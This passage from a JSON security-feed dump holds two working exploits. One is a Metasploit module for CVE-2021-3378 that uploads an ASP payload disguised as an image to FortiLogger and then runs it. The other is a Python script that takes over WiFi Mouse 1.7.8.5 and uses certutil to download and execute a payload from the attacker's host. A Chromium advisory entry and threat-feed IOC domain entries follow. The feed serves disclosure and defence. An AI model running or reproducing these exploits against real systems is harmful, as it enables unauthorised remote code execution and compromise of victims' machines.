\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module \n], \n'References' => \n[ \n['CVE', '2021-3378'], \n['URL', 'https://erberkan.github.io/2021/cve-2021-3378/'] \n], \n \n'Platform' => ['win'], \n'Privileged' => false, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ \n'FortiLogger - 4.4.2.2', \n{ \n'Platform' => 'win' \n} \n], \n], \n'DisclosureDate' => '2021-02-26', \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(5000), \nOptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/']) \n], self.class \n) \nend \n \ndef check_product_info \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'), \n'method' => 'POST', \n'data' => '', \n'headers' => { \n'Accept' => 'application/json, text/javascript, */*; q=0.01', \n'Accept-Language' => 'en-US,en;q=0.5', \n'Accept-Encoding' => 'gzip, deflate', \n'X-Requested-With' => 'XMLHttpRequest' \n} \n) \n \nreturn res \nend \n \ndef check \nbegin \nres = check_product_info \nif res && res.code == 200 \nif JSON.parse(res.body)['Version'] == '4.4.2.2' \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \nend \nend \n \ndef create_payload \nMsf::Util::EXE.to_exe_asp(generate_payload_exe).to_s \nend \n \ndef exploit \nbegin \nprint_good('Generate Payload !') \ndata = create_payload \n \nboundary = \"----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}\" \npost_data = \"--#{boundary}\\r\\n\" \npost_data << \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"b3r.asp\\\"\\r\\n\" \npost_data << \"Content-Type: image/png\\r\\n\" \npost_data << \"\\r\\n#{data}\\r\\n\" \npost_data << \"--#{boundary}\\r\\n\" \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'), \n'ctype' => \"multipart/form-data; boundary=#{boundary}\", \n'data' => post_data, 
\n'headers' => { \n'Accept' => 'application/json', \n'Accept-Language' => 'en-US,en;q=0.5', \n'X-Requested-With' => 'XMLHttpRequest' \n} \n) \nif res && res.code == 200 \nif JSON.parse(res.body)['Message'] == 'Error in saving file' \nprint_error('Error for upload payload..') \nelse \nprint_good('Payload has been uploaded !') \n \nhandler \n \nprint_status('Executing payload...') \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), \n'method' => 'GET' \n}, 5) \nend \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/161601/fortilogger4422-upload.rb.txt"}, {"lastseen": "2021-03-01T16:08:58", "description": "", "published": "2021-02-28T00:00:00", "type": "packetstorm", "title": "WiFi Mouse 1.7.8.5 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-02-28T00:00:00", "id": "PACKETSTORM:161586", "href": "https://packetstormsecurity.com/files/161586/WiFi-Mouse-1.7.8.5-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution \n# Date: 25-02-2021 \n# Author: H4rk3nz0 \n# Vendor Homepage: http://necta.us/ \n# Software Link: http://wifimouse.necta.us/#download \n# Version: 1.7.8.5 \n# Tested on: Windows Enterprise Build 17763 \n \n# Desktop Server software used by mobile app has PIN option which does not to prevent command input. \n# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. 
\n \n#!/usr/bin/python \n \nfrom socket import socket, AF_INET, SOCK_STREAM \nfrom time import sleep \nimport sys \nimport string \n \ntarget = socket(AF_INET, SOCK_STREAM) \nport = 1978 \n \ntry: \nrhost = sys.argv[1] \nlhost = sys.argv[2] \npayload = sys.argv[3] \nexcept: \nprint(\"USAGE: python \" + sys.argv[0]+ \" <target-ip> <local-http-server-ip> <payload-name>\") \nexit() \n \n \ncharacters={ \n\"A\":\"41\",\"B\":\"42\",\"C\":\"43\",\"D\":\"44\",\"E\":\"45\",\"F\":\"46\",\"G\":\"47\",\"H\":\"48\",\"I\":\"49\",\"J\":\"4a\",\"K\":\"4b\",\"L\":\"4c\",\"M\":\"4d\",\"N\":\"4e\", \n\"O\":\"4f\",\"P\":\"50\",\"Q\":\"51\",\"R\":\"52\",\"S\":\"53\",\"T\":\"54\",\"U\":\"55\",\"V\":\"56\",\"W\":\"57\",\"X\":\"58\",\"Y\":\"59\",\"Z\":\"5a\", \n\"a\":\"61\",\"b\":\"62\",\"c\":\"63\",\"d\":\"64\",\"e\":\"65\",\"f\":\"66\",\"g\":\"67\",\"h\":\"68\",\"i\":\"69\",\"j\":\"6a\",\"k\":\"6b\",\"l\":\"6c\",\"m\":\"6d\",\"n\":\"6e\", \n\"o\":\"6f\",\"p\":\"70\",\"q\":\"71\",\"r\":\"72\",\"s\":\"73\",\"t\":\"74\",\"u\":\"75\",\"v\":\"76\",\"w\":\"77\",\"x\":\"78\",\"y\":\"79\",\"z\":\"7a\", \n\"1\":\"31\",\"2\":\"32\",\"3\":\"33\",\"4\":\"34\",\"5\":\"35\",\"6\":\"36\",\"7\":\"37\",\"8\":\"38\",\"9\":\"39\",\"0\":\"30\", \n\" \":\"20\",\"+\":\"2b\",\"=\":\"3d\",\"/\":\"2f\",\"_\":\"5f\",\"<\":\"3c\", \n\">\":\"3e\",\"[\":\"5b\",\"]\":\"5d\",\"!\":\"21\",\"@\":\"40\",\"#\":\"23\",\"$\":\"24\",\"%\":\"25\",\"^\":\"5e\",\"&\":\"26\",\"*\":\"2a\", \n\"(\":\"28\",\")\":\"29\",\"-\":\"2d\",\"'\":\"27\",'\"':\"22\",\":\":\"3a\",\";\":\"3b\",\"?\":\"3f\",\"`\":\"60\",\"~\":\"7e\", \n\"\\\\\":\"5c\",\"|\":\"7c\",\"{\":\"7b\",\"}\":\"7d\",\",\":\"2c\",\".\":\"2e\"} \n \n \ndef openCMD(): \ntarget.sendto(\"6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a\".decode(\"hex\"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe \n \ndef SendString(string): \nfor char in string: \ntarget.sendto((\"7574663820\" + characters[char] + \"0a\").decode(\"hex\"),(rhost,port)) # 
Sends Character hex with packet padding \nsleep(0.03) \n \ndef SendReturn(): \ntarget.sendto(\"6b657920203352544e\".decode(\"hex\"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app \nsleep(0.5) \n \ndef exploit(): \nprint(\"[+] 3..2..1..\") \nsleep(2) \nopenCMD() \nprint(\"[+] *Super fast hacker typing*\") \nsleep(1) \nSendString(\"certutil.exe -urlcache -f http://\" + lhost + \"/\" + payload + \" C:\\\\Windows\\\\Temp\\\\\" + payload) \nSendReturn() \nprint(\"[+] Retrieving payload\") \nsleep(3) \nSendString(\"C:\\\\Windows\\\\Temp\\\\\" + payload) \nSendReturn() \nprint(\"[+] Done! Check Your Listener?\") \n \n \ndef main(): \ntarget.connect((rhost,port)) \nexploit() \ntarget.close() \nexit() \n \nif __name__==\"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161586/wifimouse1785-exec.txt"}], "fedora": [{"lastseen": "2021-02-28T23:00:01", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2021-02-28T17:27:09", "published": "2021-02-28T17:27:09", "id": "FEDORA:A9575304C34D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: chromium-88.0.4324.182-1.fc33", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "rst": [{"lastseen": "2021-02-27T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **repair-windows[.]ru** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-02-27T03:00:00.\n IOC tags: **spam**.\nIOC could be a **False Positive** (Domain not resolved. 
Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:4D98FB1F-751D-3EA5-B7A0-C9B5C3D47716", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: repair-windows.ru", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **browser-stat[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2021-02-12T03:00:00, Last seen: 2021-02-26T03:00:00.\n IOC tags: **malware**.\nWhois:\n Created: 2020-11-02 12:26:03, \n Registrar: Internet Domain Service BS Corp, \n Registrant: unknown.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-12T00:00:00", "id": "RST:4130EE30-69BA-3910-A7E8-8E4D968A0F85", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: browser-stat.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-27T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **windows-key-sale[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **2**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-02-27T03:00:00.\n IOC tags: **spam**.\nDomain has DNS A records: 156[.]241.165.74\nWhois:\n Created: 2020-10-21 18:20:22, \n Registrar: unknown, \n Registrant: MAFF AVENUE INC.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:CDF2D575-0A0F-3E72-991E-4DE685B4F64C", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. 
IOC: windows-key-sale.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **check-browser[.]site** in [RST Threat Feed](https://rstcloud.net/profeed) with score **51**.\n First seen: 2021-02-24T03:00:00, Last seen: 2021-02-26T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 23[.]202.231.167,23.217.138.108\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-24T00:00:00", "id": "RST:B524D3AC-0499-3616-A685-1102FFD7B860", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: check-browser.site", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **2020-windows[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2020-11-21T03:00:00, Last seen: 2021-02-26T03:00:00.\n IOC tags: **malware**.\nWhois:\n Created: 2020-06-19 03:40:11, \n Registrar: PDR Ltd dba PublicDomainRegistrycom, \n Registrant: unknown.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-11-21T00:00:00", "id": "RST:B2D1192F-FCD8-320B-A1A1-3B7D0F381C26", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. 
IOC: 2020-windows.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-27T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **https://raw[.]githubusercontent.com/secwiki/windows-kernel-exploits/master/ms15-076/binary/trebuchet.exe** in [RST Threat Feed](https://rstcloud.net/profeed) with score **30**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-02-27T03:00:00.\n IOC tags: **malware**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:E76397AD-3D70-3319-9752-70836BA797B9", "href": "", "published": "2021-02-28T00:00:00", "title": "RST Threat feed. IOC: https://raw.githubusercontent.com/secwiki/windows-kernel-exploits/master/ms15-076/binary/trebuchet.exe", "type": "rst", "cvss": {}}]}